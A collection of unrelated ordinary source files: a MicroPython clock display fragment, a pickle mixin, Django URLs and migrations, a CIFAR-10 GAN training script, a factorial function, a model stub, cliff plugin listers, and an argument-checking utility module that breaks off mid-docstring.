minute_poly,
114, # 119-5 (half polygon_width)
49, # 119-70 (polygon_height - tail)
st7789.BLACK,
minute_ang,
5, # center of
70) # polygon rotation
# get the bounding rectangle of the minute_polygon as drawn and
# reset the bounding box for the next polygon
minute_bound = tft.bounding(True)
# draw and fill the second hand polygon rotated to second_ang
tft.fill_polygon(
second_poly,
116, # 119-3 (half polygon_width)
49, # 119-70 (polygon_height - tail)
st7789.RED,
second_ang,
3, # center of
70) # polygon rotation
# get the bounding rectangle of the second_polygon as drawn and
# reset the bounding box for the next polygon
second_bound = tft.bounding(True)
# wait until the current second changes
while last == utime.time():
utime.sleep_ms(50)
finally:
# shutdown spi
if 'spi' in locals():
spi.deinit()
main()
|
from __future__ import (
annotations,
)
import pickle
from . import (
Path_,
)
from typing import (
Any,
Protocol,
NoReturn,
)
from . import (
Pkl,
)
class PklIF(
Protocol,
):
def to_pickle(
self,
path: Path_,
) -> NoReturn:
Pkl.dump(
obj=self,
path=path,
)
@staticmethod
def from_pickle(
path: Path_,
) -> PklIF:
obj = Pkl.load(
path=path,
)
return obj |
from django.urls import path
from .views import *
urlpatterns = [
path('desafioInovacao', DesafioInovacao.as_view(), name="desafioInovacao"),
path('desafioInovacao/<int:pk>', DesafioInovacaoDetailView.as_view(),
name='desafioInovacao-detail'),
path('desafioInovacao/create/', DesafioInovacaoCreate.as_view(),
name='desafioInovacao_create'),
path('desafioInovacao/<int:pk>/update/',
DesafioInovacaoUpdate.as_view(), name='desafioInovacao_update'),
path('desafioInovacao/<int:pk>/delete/',
DesafioInovacao.as_view(), name='desafioInovacao_delete'),
]
|
# -*- coding: utf-8 -*-
"""D_With_G
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1uqdOlUPpor_JN2EDdGx2V2KbXLqvCIEX
"""
import matplotlib
matplotlib.use('Agg')
import torch
import torch.nn as nn
import torch.utils.data as Data
import torchvision
import torchvision.transforms as transforms
import torch.optim as optim
import os
import numpy as np
from torch.autograd import Variable
import time
class discriminator(nn.Module):
def __init__(self):
super(discriminator, self).__init__()
self.conv1 = nn.Sequential(
nn.Conv2d(
in_channels = 3,
out_channels = 196,
kernel_size = 3,
stride = 1,
padding = 1
),
nn.LayerNorm((196,32,32)),
nn.LeakyReLU(),
)
self.conv2 = nn.Sequential(
nn.Conv2d(196, 196, 3, 2, 1),
nn.LayerNorm((196,16,16)),
nn.LeakyReLU(),
)
self.conv3 = nn.Sequential(
nn.Conv2d(196, 196, 3, 1, 1),
nn.LayerNorm((196,16,16)),
nn.LeakyReLU(),
)
self.conv4 = nn.Sequential(
nn.Conv2d(196, 196, 3, 2, 1),
nn.LayerNorm((196,8,8)),
nn.LeakyReLU(),
)
self.conv5 = nn.Sequential(
nn.Conv2d(196, 196, 3, 1, 1),
nn.LayerNorm((196,8,8)),
nn.LeakyReLU(),
)
self.conv6 = nn.Sequential(
nn.Conv2d(196, 196, 3, 1, 1),
nn.LayerNorm((196,8,8)),
nn.LeakyReLU(),
)
self.conv7 = nn.Sequential(
nn.Conv2d(196, 196, 3, 1, 1),
nn.LayerNorm((196,8,8)),
nn.LeakyReLU(),
)
self.conv8 = nn.Sequential(
nn.Conv2d(196, 196, 3, 2, 1),
nn.LayerNorm((196,4,4)),
nn.LeakyReLU(),
)
self.pool = nn.MaxPool2d(4,4)
self.fc1 = nn.Sequential(
nn.Linear(196,1),
)
self.fc10 = nn.Sequential(
nn.Linear(196,10)
)
def forward(self, x):
#print('shape',x.size())
x = self.conv1(x)
#print('conv1')
#print('shape',x.size())
x = self.conv2(x)
#print('conv2')
#print('shape',x.size())
x = self.conv3(x)
#print('conv3')
#print('shape',x.size())
x = self.conv4(x)
#print('conv4')
#print('shape',x.size())
x = self.conv5(x)
#print('conv5')
#print('shape',x.size())
x = self.conv6(x)
#print('conv6')
#print('shape',x.size())
x = self.conv7(x)
#print('conv7')
#print('shape',x.size())
x = self.conv8(x)
#print('conv8')
#print('shape',x.size())
x = self.pool(x)
#x = x.view(x.size(0),-1)
x = x.view(-1, 196 * 1 * 1)
#print('view')
#print('shape',x.size())
critic = self.fc1(x)
aux = self.fc10(x)
return critic, aux
class generator(nn.Module):
def __init__(self):
super(generator, self).__init__()
self.fc1 = nn.Sequential(
nn.Linear(100,196*4*4),
)
self.conv1 = nn.Sequential(
nn.ConvTranspose2d(
in_channels = 196,
out_channels = 196,
kernel_size = 4,
stride = 2,
padding = 1
),
nn.BatchNorm2d(196),
nn.ReLU(),
)
self.conv2 = nn.Sequential(
nn.Conv2d(196, 196, 3, 1, 1),
nn.BatchNorm2d(196),
nn.ReLU(),
)
self.conv3 = nn.Sequential(
nn.Conv2d(196, 196, 3, 1, 1),
nn.BatchNorm2d(196),
nn.LeakyReLU(),
)
self.conv4 = nn.Sequential(
nn.Conv2d(196, 196, 3, 1, 1),
nn.BatchNorm2d(196),
nn.LeakyReLU(),
)
self.conv5 = nn.Sequential(
nn.ConvTranspose2d(196, 196, 4, 2, 1),
nn.BatchNorm2d(196),
nn.ReLU(),
)
self.conv6 = nn.Sequential(
nn.Conv2d(196, 196, 3, 1, 1),
nn.BatchNorm2d(196),
nn.ReLU(),
)
self.conv7 = nn.Sequential(
nn.ConvTranspose2d(196, 196, 4, 2, 1),
nn.BatchNorm2d(196),
nn.ReLU(),
)
self.conv8 = nn.Sequential(
nn.Conv2d(196, 3, 3, 1, 1),
nn.Tanh(),
)
def forward(self, x):
#print('shape',x.size())
x = self.fc1(x)
#print('fc1')
#print('shape',x.size())
x = x.view(x.size(0), 196, 4, 4)
#print('view')
#print('shape',x.size())
x = self.conv1(x)
#print('conv1')
#print('shape',x.size())
x = self.conv2(x)
#print('conv2')
#print('shape',x.size())
x = self.conv3(x)
#print('conv3')
#print('shape',x.size())
x = self.conv4(x)
#print('conv4')
#print('shape',x.size())
x = self.conv5(x)
#print('conv5')
#print('shape',x.size())
x = self.conv6(x)
#print('conv6')
#print('shape',x.size())
x = self.conv7(x)
#print('conv7')
#print('shape',x.size())
x = self.conv8(x)
#print('conv8')
#print('shape',x.size())
return x
import numpy as np
import torch
import torchvision
import os
import torchvision.transforms as transforms
import matplotlib.pyplot as plt
import matplotlib as mpl
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.autograd import Variable
import torch.autograd as autograd
# import data and data augmentation
transform_train = transforms.Compose([
transforms.RandomResizedCrop(32, scale=(0.7, 1.0), ratio=(1.0,1.0)),
transforms.ColorJitter(
brightness=0.1*torch.randn(1),
contrast=0.1*torch.randn(1),
saturation=0.1*torch.randn(1),
hue=0.1*torch.randn(1)),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
])
transform_test = transforms.Compose([
transforms.CenterCrop(32),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
])
batch_size = 128
trainset = torchvision.datasets.CIFAR10(root='./', train=True, download=True, transform=transform_train)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=batch_size, shuffle=True, num_workers=8)
testset = torchvision.datasets.CIFAR10(root='./', train=False, download=False, transform=transform_test)
testloader = torch.utils.data.DataLoader(testset, batch_size=batch_size, shuffle=False, num_workers=8)
def calc_gradient_penalty(netD, real_data, fake_data):
DIM = 32
LAMBDA = 10
alpha = torch.rand(batch_size, 1)
alpha = alpha.expand(batch_size, int(real_data.nelement()/batch_size)).contiguous()
alpha = alpha.view(batch_size, 3, DIM, DIM)
alpha = alpha.cuda()
fake_data = fake_data.view(batch_size, 3, DIM, DIM)
interpolates = alpha * real_data.detach() + ((1 - alpha) * fake_data.detach())
interpolates = interpolates.cuda()
interpolates.requires_grad_(True)
disc_interpolates, _ = netD(interpolates)
gradients = autograd.grad(outputs=disc_interpolates, inputs=interpolates,
grad_outputs=torch.ones(disc_interpolates.size()).cuda(),
create_graph=True, retain_graph=True, only_inputs=True)[0]
gradients = gradients.view(gradients.size(0), -1)
gradient_penalty = ((gradients.norm(2, dim=1) - 1) ** 2).mean() * LAMBDA
return gradient_penalty
#import matplotlib
#matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import os
import time
def plot(samples):
fig = plt.figure(figsize=(10, 10))
gs = gridspec.GridSpec(10, 10)
gs.update(wspace=0.02, hspace=0.02)
for i, sample in enumerate(samples):
ax = plt.subplot(gs[i])
plt.axis('off')
ax.set_xticklabels([])
ax.set_yticklabels([])
ax.set_aspect('equal')
plt.imshow(sample)
return fig
aD = torch.load('tempD.model')
#aD = discriminator()
aD.cuda()
aG = torch.load('tempG.model')
#aG = generator()
aG.cuda()
optimizer_g = torch.optim.Adam(aG.parameters(), lr=0.0001, betas=(0,0.9))
optimizer_d = torch.optim.Adam(aD.parameters(), lr=0.0001, betas=(0,0.9))
criterion = nn.CrossEntropyLoss()
n_z = 100
n_classes = 10
np.random.seed(352)
label = np.asarray(list(range(10))*10)
noise = np.random.normal(0,1,(100,n_z))
label_onehot = np.zeros((100,n_classes))
label_onehot[np.arange(100), label] = 1
noise[np.arange(100), :n_classes] = label_onehot[np.arange(100)]
noise = noise.astype(np.float32)
save_noise = torch.from_numpy(noise)
save_noise = Variable(save_noise).cuda()
start_time = time.time()
# Train the model
num_epochs = 200
for epoch in range(111,num_epochs):
if (epoch > 6):
for group in optimizer_g.param_groups:
for p in group['params']:
state = optimizer_g.state[p]
if 'step' in state.keys():
if(state['step']>=1024):
state['step'] = 1000
if (epoch > 6):
for group in optimizer_d.param_groups:
for p in group['params']:
state = optimizer_d.state[p]
if 'step' in state.keys():
if(state['step']>=1024):
state['step'] = 1000
aG.train()
aD.train()
loss1 = []
loss2 = []
loss3 = []
loss4 = []
loss5 = []
acc1 = []
for batch_idx, (X_train_batch, Y_train_batch) in enumerate(trainloader):
if(Y_train_batch.shape[0] < batch_size):
continue
# train G
gen_train = 1
if((batch_idx%gen_train)==0):
for p in aD.parameters():
p.requires_grad_(False)
aG.zero_grad()
label = np.random.randint(0,n_classes,batch_size)
noise = np.random.normal(0,1,(batch_size,n_z))
label_onehot = np.zeros((batch_size,n_classes))
label_onehot[np.arange(batch_size), label] = 1
noise[np.arange(batch_size), :n_classes] = label_onehot[np.arange(batch_size)]
noise = noise.astype(np.float32)
noise = torch.from_numpy(noise)
noise = Variable(noise).cuda()
fake_label = Variable(torch.from_numpy(label)).cuda()
fake_data = aG(noise)
gen_source, gen_class = aD(fake_data)
gen_source = gen_source.mean()
gen_class = criterion(gen_class, fake_label)
gen_cost = -gen_source + gen_class
gen_cost.backward()
optimizer_g.step()
# train D
for p in aD.parameters():
p.requires_grad_(True)
aD.zero_grad()
# train discriminator with input from generator
label = np.random.randint(0,n_classes,batch_size)
noise = np.random.normal(0,1,(batch_size,n_z))
label_onehot = np.zeros((batch_size,n_classes))
label_onehot[np.arange(batch_size), label] = 1
noise[np.arange(batch_size), :n_classes] = label_onehot[np.arange(batch_size)]
noise = noise.astype(np.float32)
noise = torch.from_numpy(noise)
noise = Variable(noise).cuda()
fake_label = Variable(torch.from_numpy(label)).cuda()
with torch.no_grad():
fake_data = aG(noise)
disc_fake_source, disc_fake_class = aD(fake_data)
disc_fake_source = disc_fake_source.mean()
disc_fake_class = criterion(disc_fake_class, fake_label)
# train discriminator with input from the discriminator
real_data = Variable(X_train_batch).cuda()
real_label = Variable(Y_train_batch).cuda()
disc_real_source, disc_real_class = aD(real_data)
prediction = disc_real_class.data.max(1)[1]
accuracy = ( float( prediction.eq(real_label.data).sum() ) /float(batch_size))*100.0
disc_real_source = disc_real_source.mean()
disc_real_class = criterion(disc_real_class, real_label)
gradient_penalty = calc_gradient_penalty(aD,real_data,fake_data)
disc_cost = disc_fake_source - disc_real_source + disc_real_class + disc_fake_class + gradient_penalty
disc_cost.backward()
optimizer_d.step()
loss1.append(gradient_penalty.item())
loss2.append(disc_fake_source.item())
loss3.append(disc_real_source.item())
loss4.append(disc_real_class.item())
loss5.append(disc_fake_class.item())
acc1.append(accuracy)
if((batch_idx%50)==0):
print('epoch:', epoch, ' ', 'batch_idx:', batch_idx, ' ', 'loss1',"%.2f" % np.mean(loss1),
'loss2',"%.2f" % np.mean(loss2),
'loss3',"%.2f" % np.mean(loss3),
'loss4',"%.2f" % np.mean(loss4),
'loss5',"%.2f" % np.mean(loss5),
'acc1',"%.2f" % np.mean(acc1))
# Test the model
aD.eval()
with torch.no_grad():
test_accu = []
for batch_idx, (X_test_batch, Y_test_batch) in enumerate(testloader):
X_test_batch, Y_test_batch= Variable(X_test_batch).cuda(),Variable(Y_test_batch).cuda()
with torch.no_grad():
_, output = aD(X_test_batch)
prediction = output.data.max(1)[1] # first column has actual prob.
accuracy = ( float( prediction.eq(Y_test_batch.data).sum() ) /float(batch_size))*100.0
test_accu.append(accuracy)
accuracy_test = np.mean(test_accu)
print('Testing',accuracy_test, time.time()-start_time)
### save output
with torch.no_grad():
aG.eval()
samples = aG(save_noise)
samples = samples.data.cpu().numpy()
samples += 1.0
samples /= 2.0
samples = samples.transpose(0,2,3,1)
aG.train()
fig = plot(samples)
plt.savefig('output/%s.png' % str(epoch).zfill(3), bbox_inches='tight')
plt.close(fig)
if(((epoch+1)%1)==0):
torch.save(aG,'tempG.model')
torch.save(aD,'tempD.model')
torch.save(aG,'generator.model')
torch.save(aD,'discriminator.model')
|
def iter_fact(n):
'''
assumes that n is an int > 0
returns n!
'''
result = 1
while n > 1:
result *= n
n -= 1
return result
iter_fact(5)
|
#!/usr/bin/env python
""" Class representing a AI Model.
Represents a AI Model. AI Models are used by AI Agents to process
incoming data.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files(the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and / or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Contributors:
"""
from modules.AbstractModel import AbstractModel
class model(AbstractModel):
""" Class representing a AI Model.
This object represents a AI Model.AI Models are used by AI Agents
to process incoming data.
"""
def prepare_data(self):
""" Creates/sorts dataset. """
pass
def prepare_network(self):
""" Builds the network. """
pass
def train(self):
""" Trains the model
Trains the neural network.
"""
pass
def freeze_model(self):
""" Freezes the model """
pass
def save_model_as_json(self):
""" Saves the model as JSON """
pass
def save_weights(self):
""" Saves the model weights """
pass
def visualize_metrics(self):
""" Visualize the metrics. """
pass
def confusion_matrix(self):
""" Prints/displays the confusion matrix. """
pass
def figures_of_merit(self):
""" Calculates/prints the figures of merit.
https://homes.di.unimi.it/scotti/all/
"""
pass
def load(self):
""" Loads the model """
pass
def evaluate(self):
""" Evaluates the model """
pass
def predictions(self):
""" Gets a prediction for an image. """
pass
def predict(self, img):
""" Gets a prediction for an image. """
pass
def reshape(self, img):
""" Reshapes an image. """
pass
def test(self):
""" Test mode
Loops through the test directory and classifies the images.
"""
pass
|
import logging
from cliff import lister
import pkg_resources
LOG = logging.getLogger(__name__)
class GroupList(lister.Lister):
"""Shows the groups for which plugins are available.
"""
def take_action(self, parsed_args):
names = set()
for dist in pkg_resources.working_set:
LOG.debug('checking distribution "%s"', dist)
entry_map = pkg_resources.get_entry_map(dist)
names.update(set(entry_map.keys()))
return (
('Name',),
((n,) for n in sorted(names)),
)
class GroupShow(lister.Lister):
"""Shows the members of a specific group.
"""
def get_parser(self, prog_name):
p = super(GroupShow, self).get_parser(prog_name)
p.add_argument(
'group',
help='the name of the group to show',
)
return p
def take_action(self, parsed_args):
results = []
for ep in pkg_resources.iter_entry_points(parsed_args.group):
try:
ep.load()
except Exception as err:
load_error = str(err) # unicode?
else:
load_error = ''
attr = '.'.join(ep.attrs)
results.append((
ep.name,
ep.module_name,
attr,
str(ep.dist), # unicode?
load_error,
))
return (
('Name', 'Module', 'Member', 'Distribution', 'Error'),
results,
)
|
# Generated by Django 2.2.11 on 2020-05-20 11:15
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('resources', '0116_merge_20200520_1347'),
]
operations = [
migrations.AddField(
model_name='resource',
name='resource_email',
field=models.EmailField(blank=True, max_length=254, null=True, verbose_name='Email for Outlook'),
),
migrations.AlterField(
model_name='accessibilityvalue',
name='created_at',
field=models.DateTimeField(auto_now_add=True, verbose_name='Lisäysaika'),
),
migrations.AlterField(
model_name='accessibilityvalue',
name='modified_at',
field=models.DateTimeField(auto_now=True, verbose_name='Muokkausaika'),
),
migrations.AlterField(
model_name='accessibilityviewpoint',
name='created_at',
field=models.DateTimeField(auto_now_add=True, verbose_name='Lisäysaika'),
),
migrations.AlterField(
model_name='accessibilityviewpoint',
name='modified_at',
field=models.DateTimeField(auto_now=True, verbose_name='Muokkausaika'),
),
migrations.AlterField(
model_name='accessibilityviewpoint',
name='order_text',
field=models.CharField(default='0', max_length=200, verbose_name='Tilaus'),
),
migrations.AlterField(
model_name='resourceaccessibility',
name='created_at',
field=models.DateTimeField(auto_now_add=True, verbose_name='Lisäysaika'),
),
migrations.AlterField(
model_name='resourceaccessibility',
name='modified_at',
field=models.DateTimeField(auto_now=True, verbose_name='Muokkausaika'),
),
migrations.AlterField(
model_name='resourceaccessibility',
name='resource',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='accessibility_summaries', to='resources.Resource', verbose_name='Resurssi'),
),
migrations.AlterField(
model_name='unitaccessibility',
name='created_at',
field=models.DateTimeField(auto_now_add=True, verbose_name='Lisäysaika'),
),
migrations.AlterField(
model_name='unitaccessibility',
name='modified_at',
field=models.DateTimeField(auto_now=True, verbose_name='Muokkausaika'),
),
migrations.AlterField(
model_name='unitaccessibility',
name='unit',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='accessibility_summaries', to='resources.Unit', verbose_name='Resurssi'),
),
]
|
# Generated by Django 3.2.5 on 2021-08-12 20:40
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('devices', '0038_auto_20210723_1204'),
]
operations = [
migrations.RemoveField(
model_name='asset',
name='status',
),
migrations.AddField(
model_name='asset',
name='borrower',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='devices.borrower'),
),
migrations.AlterField(
model_name='borrower',
name='borrower_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='devices.borrowertype', verbose_name='Borrower Type'),
),
migrations.AlterField(
model_name='contactinfoentry',
name='primary_phone_type',
field=models.PositiveSmallIntegerField(choices=[(3, 'Mobile'), (1, 'Work'), (2, 'Home')], default=3, verbose_name='Primary Phone Number Type'),
),
migrations.AlterField(
model_name='contactinfoentry',
name='secondary_phone_type',
field=models.PositiveSmallIntegerField(blank=True, choices=[(3, 'Mobile'), (1, 'Work'), (2, 'Home')], null=True, verbose_name='Secondary Phone Number Type'),
),
migrations.AlterField(
model_name='transaction',
name='action',
field=models.PositiveSmallIntegerField(choices=[(6, 'Report Stolen'), (4, 'Report Dysfunctional'), (5, 'Report Lost'), (3, 'Report Damage'), (1, 'Check-In'), (2, 'Check-Out')], null=True),
),
]
|
# #############################################################################
# argcheck.py
# ===========
# Author : Sepand KASHANI [kashani.sepand@gmail.com]
# #############################################################################
"""
Helper functions to ease argument checking.
"""
import collections.abc as abc
import functools
import inspect
import keyword
import math
import numbers
import numpy as np
import scipy.sparse as sparse
def check(*args):
"""
Validate function parameters using boolean tests.
It is common to check parameters for correctness before executing the function/class to which
they are bound using boolean tests. :py:func:`~imot_tools.util.argcheck.check` is a decorator
that intercepts the output of boolean functions and raises :py:exc:`ValueError` when the result
is :py:obj:`False`.
Parameters
----------
*args
2 invocations supported:
a) 2-argument mode:
* `args[0]`: name of the decorated functon's parameter to test.
* `args[1]`: boolean function to apply to the parameter value.
b) 1-argument mode: (parameter-name -> boolean function) map.
Returns
-------
:py:obj:`~typing.Callable`
Function decorator.
Raises
------
:py:exc:`ValueError`
If any of the boolean functions return :py:obj:`False`.
Examples
--------
.. testsetup::
from imot_tools.util.argcheck import check, require_all
def is_5(obj):
return obj == 5
def is_int(obj):
return isinstance(obj, int)
def is_str(obj):
return isinstance(obj, str)
Suppose we have the following boolean functions to test an object for similarity to the number
5:
.. doctest::
>>> def is_5(obj):
... return obj == 5
>>> def is_int(obj):
... return isinstance(obj, int)
>>> def is_str(obj):
... return isinstance(obj, str)
When used in conjunction with :py:func:`~imot_tools.util.argcheck.check`, type-checking function
parameters becomes possible:
.. doctest::
>>> @check('x', is_5) # 2-argument mode
... def f(x):
... return x
>>> f(5)
5
>>> f(4)
Traceback (most recent call last):
...
ValueError: Parameter[x] of f() does not satisfy is_5().
.. doctest::
>>> @check(dict(x=is_str, y=is_int)) # 1-argument mode
... def g(x, y):
... return x, y
>>> g('5', 3)
('5', 3)
>>> g(5, 3)
Traceback (most recent call last):
...
ValueError: Parameter[x] of g() does not satisfy is_str().
"""
if len(args) == 1:
return _check(m=args[0])
elif len(args) == 2:
return _check(m={args[0]: args[1]})
else:
raise ValueError("Expected 1 or 2 arguments.")
def _check(m):
if not isinstance(m, abc.Mapping):
raise TypeError("Expected (str, boolean function) map")
key_error = lambda k: f"Key[{k}] must be a valid string identifier."
value_error = lambda k: f"Value[Key[{k}]] must be a boolean function."
for k, v in m.items():
if not isinstance(k, str):
raise TypeError(key_error(k))
if not (k.isidentifier() and (not keyword.iskeyword(k))):
raise ValueError(key_error(k))
if not inspect.isfunction(v):
raise TypeError(value_error(k))
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
func_args = inspect.getcallargs(func, *args, **kwargs)
for k, fn in m.items():
if k not in func_args:
raise ValueError(
f"Parameter[{k}] not part of {func.__qualname__}() parameter list."
)
if fn(func_args[k]) is False:
raise ValueError(
f"Parameter[{k}] of {func.__qualname__}()"
f" does not satisfy {fn.__name__}()."
)
return func(*args, **kwargs)
return wrapper
return decorator
def allow_None(func):
"""
Relax boolean function for :py:obj:`None` input.
A boolean function wrapped by :py:func:`~imot_tools.util.argcheck.allow_None` returns
:py:obj:`True` if it's input is :py:obj:`None`.
Parameters
----------
func : :py:obj:`~typing.Callable`
Boolean function.
Returns
-------
:py:obj:`~typing.Callable`
Boolean function.
Examples
--------
.. testsetup::
from imot_tools.util.argcheck import allow_None, check, is_integer
.. doctest::
>>> def is_5(x):
... return x == 5
>>> is_5(5), is_5(None)
(True, False)
>>> allow_None(is_5)(None)
True
When used in conjunction with :py:func:`~imot_tools.util.argcheck.check`, it is possible to
type-check parameters having default arguments set to :py:obj:`None`:
.. doctest::
>>> @check('x', is_integer)
... def f(x: int = None):
... return print(x)
>>> f() # ValueError because is_integer(None) is False.
Traceback (most recent call last):
...
ValueError: Parameter[x] of f() does not satisfy is_integer().
.. doctest::
>>> @check('x', allow_None(is_integer)) # redefined to allow None.
... def g(x: int = None):
... return print(x)
>>> g() # Now it works.
None
"""
if not inspect.isfunction(func):
raise TypeError("Parameter[func] must be a boolean function.")
@functools.wraps(func)
def wrapper(x):
if x is None:
return True
return func(x)
wrapper.__name__ = f"allow_None({func.__name__})"
return wrapper
def accept_any(*funcs):
"""
Lazy union of boolean functions.
Parameters
----------
*funcs : list(bool_func)
Boolean functions.
Returns
-------
:py:obj:`~typing.Callable`
Boolean function.
Examples
--------
.. testsetup::
import numpy as np
from imot_tools.util.argcheck import accept_any, check, has_shape
.. doctest::
>>> def is_int(x):
... if isinstance(x, int):
... return True
... return False
>>> def is_5(x):
... if x == 5:
... return True
... return False
>>> accept_any(is_int, is_5)(4) # passes is_int(), is_5() un-tested
True
>>> accept_any(is_int, is_5)(np.r_[5][0]) # passes is_5()
True
>>> accept_any(is_int, is_5)('5') # fails both
False
When used with :py:func:`~imot_tools.util.argcheck.check`, a parameter can be verified to
satisfy one of several choices.
.. doctest::
>>> @check('x', accept_any(has_shape([2, 2]), has_shape([3, 3])))
... def z_rot_trace(x: np.ndarray):
... return np.trace(x)
>>> z_rot_trace(x=np.diag(np.arange(1, 3)))
3
>>> z_rot_trace(x=np.diag(np.arange(1, 4)))
6
"""
if not all(inspect.isfunction(_) for _ in funcs):
raise TypeError("Parameter[*funcs] must contain boolean functions.")
def union(x):
for fn in funcs:
if fn(x) is True:
return True
return False
union.__name__ = f"accept_any({[fn.__name__ for fn in funcs]})"
return union
def require_all(*funcs):
"""
Lazy intersection of boolean functions.
Parameters
----------
*funcs : list(bool_func)
Boolean functions.
Returns
-------
:py:obj:`~typing.Callable`
Boolean function.
Examples
--------
.. testsetup::
from imot_tools.util.argcheck import require_all, check
.. doctest::
>>> def is_int(x):
... if isinstance(x, int):
... return True
... return False
>>> def is_5(x):
... if x == 5:
... return True
... return False
>>> require_all(is_int, is_5)('5') # fails is_int()
False
>>> require_all(is_int, is_5)(4) # passes is_int(), fails is_5()
False
>>> require_all(is_int, is_5)(5) # both pass
True
When used with :py:func:`~imot_tools.util.argcheck.check`, a parameter can be verified to
satisfy several functions simultaneously:
.. doctest::
>>> def le_5(x: int):
... if x <= 5:
... return True
... return False
>>> def gt_0(x: int):
... if x > 0:
... return True
... return False
>>> @check('x', require_all(gt_0, le_5))
... def f(x):
... return x
>>> f(3)
3
>>> f(-1)
Traceback (most recent call last):
...
ValueError: Parameter[x] of f() does not satisfy require_all(['gt_0', 'le_5'])().
"""
if not all(inspect.isfunction(_) for _ in funcs):
raise TypeError("Parameter[*funcs] must contain boolean functions.")
def intersection(x):
for fn in funcs:
if fn(x) is False:
return False
return True
intersection.__name__ = f"require_all({[fn.__name__ for fn in funcs]})"
return intersection
def is_instance(*klass):
"""
Validate instance types.
Parameters
----------
*klass : list(type)
Accepted classes.
Returns
-------
:py:obj:`~typing.Callable`
Boolean function.
Examples
--------
.. testsetup::
import numpy as np
from imot_tools.util.argcheck import is_instance, check
.. doctest::
>>> is_instance(str, int)('5')
True
>>> is_instance(np.ndarray)([])
False
When used with :py:func:`~imot_tools.util.argcheck.check`, function parameters can verified to
be of a certain type:
.. doctest::
>>> @check('x', is_instance(str))
... def f(x):
... return x
>>> f('hello')
'hello'
>>> f(5)
Traceback (most recent call last):
...
ValueError: Parameter[x] of f() does not satisfy is_instance(['str'])().
"""
if not all(inspect.isclass(_) for _ in klass):
raise TypeError("Parameter[*klass] must contain types.")
def _is_instance(x):
if isinstance(x, klass):
return True
return False
_is_instance.__name__ = f"is_instance({[cl.__name__ for cl in klass]})"
return _is_instance
def is_scalar(x):
"""
Return :py:obj:`True` if `x` is a scalar object.
Examples
--------
.. testsetup::
from imot_tools.util.argcheck import is_scalar
.. doctest::
>>> is_scalar(5)
True
>>> is_scalar([5])
False
"""
if not isinstance(x, abc.Container):
return True
return False
def is_array_like(x):
"""
Return :py:obj:`True` if `x` is an array-like object.
Examples
--------
.. testsetup::
from imot_tools.util.argcheck import is_array_like
.. doctest::
>>> is_array_like(5)
False
>>> [is_array_like(_) for _ in (tuple(), np.array([]), range(5))]
[True, True, True]
>>> [is_array_like(_) for _ in (set(), dict())]
[False, False]
"""
if isinstance(x, (np.ndarray, abc.Sequence)):
return True
return False
def is_array_shape(x):
"""
Return :py:obj:`True` if `x` is a valid array shape specifier.
Examples
--------
.. testsetup::
from imot_tools.util.argcheck import is_array_shape
.. doctest::
>>> is_array_shape((5, 4))
True
>>> is_array_shape((5, 0))
False
"""
if is_array_like(x):
x = np.array(x, copy=False)
if x.ndim == 1:
if (len(x) > 0) and np.issubdtype(x.dtype, np.integer) and np.all(x > 0):
return True
return False
def has_shape(shape):
"""
Validate array shapes.
Parameters
----------
shape : list(int)
Desired array dimensions.
Returns
-------
:py:obj:`~typing.Callable`
Boolean function.
Examples
--------
.. testsetup::
from imot_tools.util.argcheck import has_shape, check
.. doctest::
>>> has_shape((1,))([5,])
True
>>> has_shape([5,])((1, 2))
False
"""
if not is_array_shape(shape):
raise ValueError("Parameter[shape] must be a valid shape specifier.")
shape = tuple(shape)
def _has_shape(x):
if is_array_like(x):
x = np.array(x, copy=False)
elif sparse.isspmatrix(x):
pass
else:
return False
if x.shape == shape:
return True
return False
_has_shape.__name__ = f"has_shape({list(shape)})"
return _has_shape
def has_ndim(ndim):
"""
Validate array dimensions.
Parameters
----------
ndim : int
Desired number of dimensions.
Returns
-------
:py:obj:`~typing.Callable`
Boolean function.
Examples
--------
.. testsetup::
from imot_tools.util.argcheck import has_ndim, check
.. doctest::
>>> has_ndim(1)([5,])
True
>>> has_ndim(2)((1,))
False
"""
if not ((is_integer(ndim)) and (ndim > 0)):
raise ValueError("Parameter[ndim] must be positive.")
def _has_ndim(x):
if is_array_like(x):
x = np.array(x, copy=False)
else:
return False
if x.ndim == ndim:
return True
return False
_has_ndim.__name__ = f"has_ndim({ndim})"
return _has_ndim
def is_integer(x):
"""
Return :py:obj:`True` if `x` is an integer.
Examples
--------
.. testsetup::
from imot_tools.util.argcheck import is_integer
.. doctest::
>>> is_integer(5)
True
>>> is_integer(5.0)
False
"""
return isinstance(x, numbers.Integral)
def has_integers(x):
"""
Return :py:obj:`True` if `x` contains integers.
Examples
--------
.. testsetup::
import numpy as np
from imot_tools.util.argcheck import has_integers
.. doctest::
